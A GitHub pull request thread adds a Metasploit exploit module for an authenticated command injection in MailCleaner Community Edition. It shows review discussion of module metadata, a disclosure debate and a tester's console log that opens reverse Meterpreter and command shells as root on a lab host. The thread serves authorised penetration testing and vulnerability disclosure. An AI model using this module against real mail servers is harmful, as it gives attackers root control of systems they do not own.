
Adding Module MailCleaner Remote Code Execution Module #11148

Merged
merged 9 commits into from
Jan 8, 2019

Conversation


@mdisec mdisec commented Dec 19, 2018

Hi fellas 🎉

This module exploits the command injection vulnerability in the MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user, which is root.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/mailcleaner
  • Set RHOST
  • Set LHOST
  • Set USERNAME
  • Set PASSWORD
  • Run exploit
  • Verify that you are seeing Awesome..! Authenticated.
  • Verify that you are getting meterpreter session.

Technical Details and MSF Module in Asciinema
https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/


wvu commented Dec 19, 2018

Hi, @mmetince! Welcome back. :P

@wvu wvu added the feature label Dec 19, 2018
@jmartin-tech

Looks like the latest update made msftidy sad. Only the warning about the newline is required.

[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/linux/http/mailcleaner_exec.rb - [INFO] No CVE references found. Please check before you land!
modules/exploits/linux/http/mailcleaner_exec.rb - [WARNING] Please add a newline at the end of the file
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------


wvu commented Dec 20, 2018

@mmetince: It sounds like you're in @jrobles-r7's very capable hands now. Thanks!


todb-r7 commented Dec 20, 2018

Hi @mmetince -- I'm assuming there hasn't been any coordinated vuln disclosure (CVD) on this, so I'm going to clue the vendor in and see about securing a CVE from DWF at https://iwantacve.org/ (since it's open source software), using this PR as a reference. Cool with you, I assume?

In the future, if you'd like to play along with CVD and maybe /not/ drop 0day on unsuspecting users, I would be happy to help disclose this stuff on your behalf per Rapid7's disclosure policy. Your bug, your choice, of course, but limiting surprises like this is usually more neighborly. :)


mdisec commented Dec 20, 2018

Hi @todb-r7, it's cool ofc.

I fully understand what you are saying. I would like to share my thoughts regarding the 0day disclosure case like this one.

Every single piece of my research goes like this: focus on the technical details, find a 0day, prepare a write-up and MSF modules, and then report it to the vendor. When the vulnerability requires authentication and the vendor doesn't respond rapidly, I go with full disclosure because I don't want to go back to the project after a couple of weeks/months. It's a waste of time when you try to remember all the technical stuff that you've done before (product installation steps etc., the MSF landing process, which requires lots of changes; thanks to people like @wvu-r7 🙏).

Cheers,

{
'SSL' => true,
'WfsDelay' => 5,
'Payload' => 'python/meterpreter/reverse_tcp'

Move to the target with python

Suggested change
'Payload' => 'python/meterpreter/reverse_tcp'

'WfsDelay' => 5,
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['unix'],

Each target specifies its platform. This can be removed.

Suggested change
'Platform' => ['unix'],


I would add all the platforms to the top-level Platform. Same for Arch. Otherwise they won't display in info. Someone can fix that if they want.


msf5 exploit(linux/http/mailcleaner_exec) > git diff
[*] exec: git diff

diff --git a/modules/exploits/linux/http/mailcleaner_exec.rb b/modules/exploits/linux/http/mailcleaner_exec.rb
index 361cbeab8a..cf92c85b10 100644
--- a/modules/exploits/linux/http/mailcleaner_exec.rb
+++ b/modules/exploits/linux/http/mailcleaner_exec.rb
@@ -33,8 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'WfsDelay' => 5,
           'Payload'  => 'python/meterpreter/reverse_tcp'
         },
-      'Platform'       => ['unix'],
-      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
+      #'Platform'       => ['unix'],
+      #'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
       'Targets'        =>
         [
           [
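Review bot: commenting out the top-level 'Platform' and 'Arch' keys rather than deleting them leaves dead lines in the module, and dropping them altogether is the wrong fix anyway: `info` reads those top-level keys, so once they are gone it prints empty Platform and Arch fields even though each target still declares its own. Keep the keys and make them the union of the per-target values, e.g. 'Platform' => ['python', 'unix'] and 'Arch' => [ ARCH_PYTHON, ARCH_CMD ].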
msf5 exploit(linux/http/mailcleaner_exec) > info
[snip]
   Platform:
       Arch:
[snip]
msf5 exploit(linux/http/mailcleaner_exec) >


Is it okay to leave the 'Targets' section as is and add all the platforms to the top-level Platform, something like the following?

      'Platform'       => ['python', 'unix'],
      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
      'Targets'        =>
        [
          [
            'Python payload',
            {
              'Platform' => 'python',
              'Arch' => ARCH_PYTHON,
            }
          ],
          [
            'Command payload',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' =>
              {
                'BadChars' => "\x26",
              }
            }
          ]
        ],
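
To make the Platform/Arch point concrete, here is an added example that is not code from the PR or from Metasploit: a small Ruby check that derives the union of per-target 'Platform' and 'Arch' values from a Targets array shaped like the one above and reports which values are missing from the top-level keys. ARCH_PYTHON and ARCH_CMD are stand-in constants assumed here, and check_module_info is a hypothetical helper, not a framework API.

```ruby
# Stand-ins for the framework's arch constants (assumed values for this example).
ARCH_PYTHON = 'python'.freeze
ARCH_CMD    = 'cmd'.freeze

# Constructed copy of the Targets array proposed in the comment above.
TARGETS = [
  ['Python payload',  { 'Platform' => 'python', 'Arch' => ARCH_PYTHON }],
  ['Command payload', { 'Platform' => 'unix',   'Arch' => ARCH_CMD,
                        'Payload'  => { 'BadChars' => "\x26" } }]
].freeze

# Collect the distinct values of one key across all targets, preserving order.
def target_union(targets, key)
  targets.flat_map { |_name, opts| Array(opts[key]) }.uniq
end

# Per-target values absent from the top-level key; an empty array means
# `info` will display every platform/arch the targets declare.
def missing_from_top_level(info, targets, key)
  target_union(targets, key) - Array(info[key])
end

# Lint a module info hash: returns { key => missing values } for the keys
# that are incomplete, so {} means the metadata is consistent.
def check_module_info(info)
  targets = info.fetch('Targets', [])
  %w[Platform Arch].each_with_object({}) do |key, problems|
    missing = missing_from_top_level(info, targets, key)
    problems[key] = missing unless missing.empty?
  end
end

# State after commenting out the top-level keys (as in the diff above).
WITHOUT_TOP_LEVEL = { 'Targets' => TARGETS }.freeze
# State proposed by the author: the union of the targets at the top level.
WITH_TOP_LEVEL = {
  'Platform' => ['python', 'unix'],
  'Arch'     => [ARCH_PYTHON, ARCH_CMD],
  'Targets'  => TARGETS
}.freeze

if __FILE__ == $PROGRAM_NAME
  p check_module_info(WITHOUT_TOP_LEVEL) # => {"Platform"=>["python", "unix"], "Arch"=>["python", "cmd"]}
  p check_module_info(WITH_TOP_LEVEL)    # => {}
end
```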


mdisec commented Jan 3, 2019

ping


wchen-r7 commented Jan 4, 2019

pong!

I believe Jacob is actively working on this PR, so no worries, this will be landed :-)

@jrobles-r7

Tested on MailCleaner Community Edition

msf5 > use exploit/linux/http/mailcleaner_exec
msf5 exploit(linux/http/mailcleaner_exec) > set username admin
username => admin
msf5 exploit(linux/http/mailcleaner_exec) > set password MCPassw0rd
password => MCPassw0rd
msf5 exploit(linux/http/mailcleaner_exec) > set rhosts 172.22.222.132
rhosts => 172.22.222.132
msf5 exploit(linux/http/mailcleaner_exec) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(linux/http/mailcleaner_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:MCPassw0rd
[*] Exploiting command injection flaw
[*] Sending stage (53508 bytes) to 172.22.222.132
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.132:49783) at 2019-01-08 13:01:38 -0600

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : mailcleaner
OS              : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.51-3 (2017-12-13)
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.132 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(linux/http/mailcleaner_exec) > set target 1
target => 1
msf5 exploit(linux/http/mailcleaner_exec) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(linux/http/mailcleaner_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:MCPassw0rd
[*] Exploiting command injection flaw
[*] Command shell session 3 opened (172.22.222.136:4444 -> 172.22.222.132:49789) at 2019-01-08 13:02:00 -0600

whoami
root
uname -a      
Linux mailcleaner 3.16.0-4-amd64 #1 SMP Debian 3.16.51-3 (2017-12-13) x86_64 GNU/Linux
^C
Abort session 3? [y/N]  y

@jrobles-r7 jrobles-r7 merged commit a0acfa7 into rapid7:master Jan 8, 2019
jrobles-r7 added a commit that referenced this pull request Jan 8, 2019
msjenkins-r7 pushed a commit that referenced this pull request Jan 8, 2019

jrobles-r7 commented Jan 8, 2019

Release Notes

The mailcleaner_exec exploit module has been added to the framework. This exploits an authenticated command injection vulnerability in the MailCleaner Community Edition product.

todb-r7 pushed a commit to todb-r7/metasploit-framework that referenced this pull request Jan 23, 2019
See PR rapid7#11148

This adds the new CVE assigned by DWF for this vulnerability.

Note that [CVE-2018-10933](https://www.cvedetails.com/cve/CVE-2018-10933/)
describes a vulnerability in libssh, but this one describes the issue as
it pertains to MailCleaner specifically.